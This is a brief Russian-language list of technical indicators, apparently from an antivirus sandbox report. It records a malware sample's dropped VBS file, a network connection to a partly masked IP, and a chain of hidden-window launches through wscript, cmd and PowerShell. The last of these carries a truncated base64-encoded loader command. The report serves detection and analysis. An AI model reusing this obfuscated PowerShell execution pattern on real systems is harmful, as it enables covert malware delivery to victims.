Техническая информация
- %TEMP%\ixp000.tmp\68d5c027ad13d.vbs
- %TEMP%\ixp000.tmp\68d5c027ad13d.vbs
- '62.##.226.168':80
- '<DNS_SERVER>':53
- '<SYSTEM32>\wscript.exe' "%TEMP%\IXP000.TMP\68d5c027ad13d.vbs"
- '<SYSTEM32>\cmd.exe' /c 68d5c027ad13d.vbs (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$ddsdgo ='WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAH... (со скрытым окном)